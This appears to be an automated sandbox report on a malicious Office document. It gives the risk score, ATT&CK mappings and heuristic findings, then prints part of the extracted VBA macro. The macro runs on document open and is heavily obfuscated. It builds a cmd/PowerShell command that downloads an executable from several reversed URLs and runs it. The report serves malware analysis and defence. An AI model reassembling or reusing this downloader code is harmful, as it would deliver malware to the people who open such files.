MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious OLE document containing a VBA macro with a Document_Open event. This macro utilizes the Shell() function to execute a command, likely to download and run a secondary payload. The reconstructed command string indicates an attempt to manipulate system settings or execute arbitrary commands.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 73,088 bytes but its declared streams total only 36,753 bytes — 36,335 bytes (50%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6020 bytes |
SHA-256: fb19174b22a30312f5c0eb216bac61f213f46a9c6e42efa687ece8861362589f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "iKLOuNFRN"
Function wqwnz()
On _
Error _
Resume _
Next
Second "Qz" + "134892806" + "XkYbIlQ" + "UO"
Second "597" + "434181702" + "80186505" + "258310909"
wFVvTT = Format(Chr(9 + 4 + 0 + 7 + 79)) + "md " + "/V/" + Format(Chr(6 + 2 + 0 + 5 + 54)) + Format(Chr(3 + 1 + 0 + 2 + 28)) + "^" + "s^" + "e" + "t " + "y^s^o=" + " ^ "
Second "KV" + "lu"
Second "z" + "URzrD"
Second "iDk" + "JFDkvIh" + "DvEoQjntvia" + "6118"
Second "2365" + "u"
GcNNUfCUawQ = "^ ^ " + "^ ^ ^" + " ^ " + "^" + " }^" + "}{h" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "t"
Second "r" + "155583106" + "jVpK" + "SS"
Second "JZZ" + "DzwJ"
Second "6852" + "N"
ltjGrKz = "a" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "^}" + "^;^ka^" + "erb;^A^" + "k^i^$^" + " " + "^m^" + "etI^-e"
Second "vWM" + "kWPj"
Second "262290310" + "Vm" + "9965" + "HXzwFi"
Second "6868" + "199732306"
Second "FHGR" + "dErG"
Second "SUS" + "mCV" + "a" + "zROj"
ZTnwEi = "kovn" + "^I;)^A^" + "ki^$^ ^" + ",^hs" + "^o" + "^$(e" + "liF^d^a" + "oln^w^" + "o"
Second "16022491" + "VQXtia" + "441950421" + "FYjT"
Second "6943" + "hwFzd"
Second "wY" + "E"
Second "TWzDrcMjFjsib" + "wMnUOpP" + "tk" + "5193"
QLTmlV = "D^.ztB" + "^${^yr" + "^t" + "{)^E" + "i^U^" + "$ n^i" + "^ ^h^" + "s" + "o^$(^" + "h" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "a^e"
Second "38777242" + "6917"
Second "ItWj" + "jaHBaJuAWOkG"
Second "MiFdPiSuQiIGP" + "GH"
qPRuYjkC = "r" + "^o^f;'" + "ex^e^" + "." + "^'+Ns^" + "l$+'\^'" + "^+"
Second "5680" + "290242265" + "pIl" + "tw"
Second "DHcsl" + "ilsiHP"
Second "AHzptY" + "N" + "rR" + "lSVWd"
dwhOzn = Format(Chr(9 + 4 + 0 + 7 + 79)) + "^i^l^b" + "^u^" + "p:vn^" + "e$=A^k^" + "i$^;" + "'0" + "2^3^" + "' =^ N" + "^s^" + "l^$;" + ")'^@^'("
wqwnz = wFVvTT + GcNNUfCUawQ + ltjGrKz + ZTnwEi + QLTmlV + qPRuYjkC + dwhOzn
Second "tirU" + "Ds" + "1940" + "dD"
Second "WXPLUPmT" + "BcU" + "vJkz" + "pSp"
End Function
Function sFQvT()
On _
Error _
Resume _
Next
Second "LpTl" + "290794446" + "MZiU" + "KrFW"
Second "t" + "300692744" + "1594" + "O"
Second "55027144" + "P" + "351730323" + "519982427"
RGwkaZ = "tilp^" + "S.'^T^e" + "^ydI^" + "tA/^s^" + "u"
Second "HQtOSBInERTAE" + "9362"
Second "WQJFbY" + "kJ"
wfuDMBuSYjR = "^.ss^en" + "i" + "su^b" + "n^ag^i^" + "h" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "^im//" + ":" + "^ptt^h" + "@^"
Second "GPaUmTQRRawp" + "3362" + "214464197" + "X"
Second "DrEX" + "uoswk" + "soKz" + "uGiP"
Second "127366324" + "38" + "UpNUsVtjkIUF" + "vz"
Second "3172" + "MWPK"
wUXfLuwooP = "l^G^h^" + "YU" + "^6zV" + "/^" + "mo" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "^.^k" + "^ils^ak" + "^d^irg" + "n" + "^i//:" + "^"
Second "z" + "iVwD"
Second "zSAoYi" + "B"
Second "483084699" + "O" + "383246444" + "5972"
Second "3855" + "wqjkmjtZkkkEv"
lcnDizQDHGp = "p^tth" + "^@Q^" + "e^" + "F" + "M^" + "A^xo0" + "65/mo" + Format(Chr(9 + 4 + 0 + 7 + 79)) + ".yt^l^" + "a"
Second "c" + "8806"
Second "fsiMYfpowhV" + "8565"
Second "tNEa" + "363209860"
BEZrj = "^" + "erem^o" + "^ha" + "^to^s^" + "ara^s//" + "^:^" + "ptth^@" + "^YY^9V" + "g" + "k^9" + "^" + "i^"
Second "wLcjPiXEYUv" + "DUOV" + "1873" + "BroEN"
QCuInBHqfdt = "q/^l^p^" + ".t^a" + "^iw" + "^k" + "^-o" + "ru^e//" + ":^"
Second "Y" + "2626" + "1471" + "90297257"
Second "138642643" + "WjdW"
Second "SbHjBww" + "413220236"
Second "306" + "WtDJjLDmb"
lcninjqOil = "pt^th^" + "@X^F" + "^yF2^y" + "Kms/^t^" + "e" + "n^.ogi"
Second "nNwRSlwq" + "a" + "6484" + "tEIjMfvzb"
Second "518766806" + "kHs" + "sztiAucPwkNZ" + "bhPbQ"
jPXtFclLkJV = "t" + "n^o" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "otn^e^" + "u" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "//^:" + "^ptth^" + "'=E^i^U" + "^" + "$;" + "^tne^i^" + "l" + Format(Chr(6 + 2 + 0 + 5 + 54)) + "^b^e" + "W^.t" + "^eN" + "^ ^"
Second "w" + "iUzuzFUaA" + "130395526" + "173316641"
QaMAIrLTwEC = "t" + Format(Chr(9 + 4 + 0 + 7 + 79)) + "^e" + "j^b^o-w" + "^e" + "n^" + "=ztB$ " + "l^l^e^"
Second "8973" + "451397177" + "vl" + "W"
Second
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.